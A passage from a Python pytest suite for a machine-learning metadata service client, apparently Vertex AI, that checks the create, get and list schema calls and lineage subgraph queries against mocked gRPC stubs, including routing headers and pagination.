assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
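
# Note on the field assertions above: the mocked stub returns the designated
# MetadataSchema directly, so the attribute checks confirm the client hands
# the stub's response back unchanged (proto-plus fields compare by value).
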
def test_create_metadata_schema_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
client.create_metadata_schema()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataSchemaRequest()
@pytest.mark.asyncio
async def test_create_metadata_schema_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.CreateMetadataSchemaRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
)
response = await client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_metadata_schema_async_from_dict():
await test_create_metadata_schema_async(request_type=dict)
def test_create_metadata_schema_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataSchemaRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
call.return_value = gca_metadata_schema.MetadataSchema()
client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_metadata_schema_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataSchemaRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_metadata_schema.MetadataSchema()
)
await client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_metadata_schema_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_metadata_schema.MetadataSchema()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_metadata_schema(
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_schema
mock_val = gca_metadata_schema.MetadataSchema(name="name_value")
assert arg == mock_val
arg = args[0].metadata_schema_id
mock_val = "metadata_schema_id_value"
assert arg == mock_val
def test_create_metadata_schema_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_metadata_schema(
metadata_service.CreateMetadataSchemaRequest(),
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
@pytest.mark.asyncio
async def test_create_metadata_schema_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_metadata_schema.MetadataSchema()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_metadata_schema(
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_schema
mock_val = gca_metadata_schema.MetadataSchema(name="name_value")
assert arg == mock_val
arg = args[0].metadata_schema_id
mock_val = "metadata_schema_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_metadata_schema_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_metadata_schema(
metadata_service.CreateMetadataSchemaRequest(),
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetMetadataSchemaRequest,
dict,
],
)
def test_get_metadata_schema(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
response = client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
def test_get_metadata_schema_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
client.get_metadata_schema()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataSchemaRequest()
@pytest.mark.asyncio
async def test_get_metadata_schema_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.GetMetadataSchemaRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
)
response = await client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_metadata_schema_async_from_dict():
await test_get_metadata_schema_async(request_type=dict)
def test_get_metadata_schema_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataSchemaRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
call.return_value = metadata_schema.MetadataSchema()
client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_metadata_schema_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataSchemaRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_schema.MetadataSchema()
)
await client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_metadata_schema_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_schema.MetadataSchema()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_metadata_schema(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_metadata_schema_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_metadata_schema(
metadata_service.GetMetadataSchemaRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_metadata_schema_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_schema.MetadataSchema()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_metadata_schema(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_metadata_schema_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_metadata_schema(
metadata_service.GetMetadataSchemaRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListMetadataSchemasRequest,
dict,
],
)
def test_list_metadata_schemas(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataSchemasResponse(
next_page_token="next_page_token_value",
)
response = client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataSchemasRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataSchemasPager)
assert response.next_page_token == "next_page_token_value"
def test_list_metadata_schemas_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
client.list_metadata_schemas()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataSchemasRequest()
@pytest.mark.asyncio
async def test_list_metadata_schemas_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.ListMetadataSchemasRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataSchemasResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataSchemasRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataSchemasAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_metadata_schemas_async_from_dict():
await test_list_metadata_schemas_async(request_type=dict)
def test_list_metadata_schemas_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataSchemasRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
call.return_value = metadata_service.ListMetadataSchemasResponse()
client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_metadata_schemas_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataSchemasRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataSchemasResponse()
)
await client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_metadata_schemas_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataSchemasResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_metadata_schemas(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_metadata_schemas_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_metadata_schemas(
metadata_service.ListMetadataSchemasRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_metadata_schemas_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataSchemasResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_metadata_schemas(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_metadata_schemas_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_metadata_schemas(
metadata_service.ListMetadataSchemasRequest(),
parent="parent_value",
)
def test_list_metadata_schemas_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
        metadata = (
            gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
        )
pager = client.list_metadata_schemas(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, metadata_schema.MetadataSchema) for i in results)
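
# Illustrative sketch (a hypothetical helper, not used by this suite): the
# sync pager can also be consumed page by page, as the pages test below does;
# draining it this way yields the same six schemas as iterating items.
def _drain_schema_pager(pager):
    items = []
    for page in pager.pages:  # each page is a ListMetadataSchemasResponse
        items.extend(page.metadata_schemas)
    return items
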
def test_list_metadata_schemas_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
pages = list(client.list_metadata_schemas(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_metadata_schemas_async_pager():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
async_pager = await client.list_metadata_schemas(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, metadata_schema.MetadataSchema) for i in responses)
@pytest.mark.asyncio
async def test_list_metadata_schemas_async_pages():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_metadata_schemas(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
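
# Note: the async variants differ only in consumption style; both the awaited
# pager and its `pages` attribute are async iterators, so items and pages
# must be drained with `async for` rather than a plain loop.
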
@pytest.mark.parametrize(
"request_type",
[
metadata_service.QueryArtifactLineageSubgraphRequest,
dict,
],
)
def test_query_artifact_lineage_subgraph(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
response = client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryArtifactLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
def test_query_artifact_lineage_subgraph_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
client.query_artifact_lineage_subgraph()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryArtifactLineageSubgraphRequest()
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.QueryArtifactLineageSubgraphRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
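        # FakeUnaryUnaryCall wraps the response so the mocked stub method can
        # be awaited like a real async gRPC call.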
response = await client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryArtifactLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_async_from_dict():
await test_query_artifact_lineage_subgraph_async(request_type=dict)
def test_query_artifact_lineage_subgraph_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryArtifactLineageSubgraphRequest()
request.artifact = "artifact_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
call.return_value = lineage_subgraph.LineageSubgraph()
client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact=artifact_value",
) in kw["metadata"]
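# A minimal sketch of the routing-header convention the assertion above relies
# on: selected request fields are serialized into a single
# "x-goog-request-params" metadata entry. Hypothetical helper, shown only to
# document the expected shape; real clients build this via
# google.api_core.gapic_v1.routing_header and URL-encode the values.
def _example_routing_header(**fields):
    """Return ("x-goog-request-params", "k1=v1&k2=v2") for the given fields."""
    value = "&".join("{}={}".format(key, val) for key, val in fields.items())
    return ("x-goog-request-params", value)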
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryArtifactLineageSubgraphRequest()
request.artifact = "artifact_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
await client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact=artifact_value",
) in kw["metadata"]
def test_query_artifact_lineage_subgraph_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.query_artifact_lineage_subgraph(
artifact="artifact_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = "artifact_value"
assert arg == mock_val
def test_query_artifact_lineage_subgraph_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.query_artifact_lineage_subgraph(
metadata_service.QueryArtifactLineageSubgraphRequest(),
artifact="artifact_value",
)
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
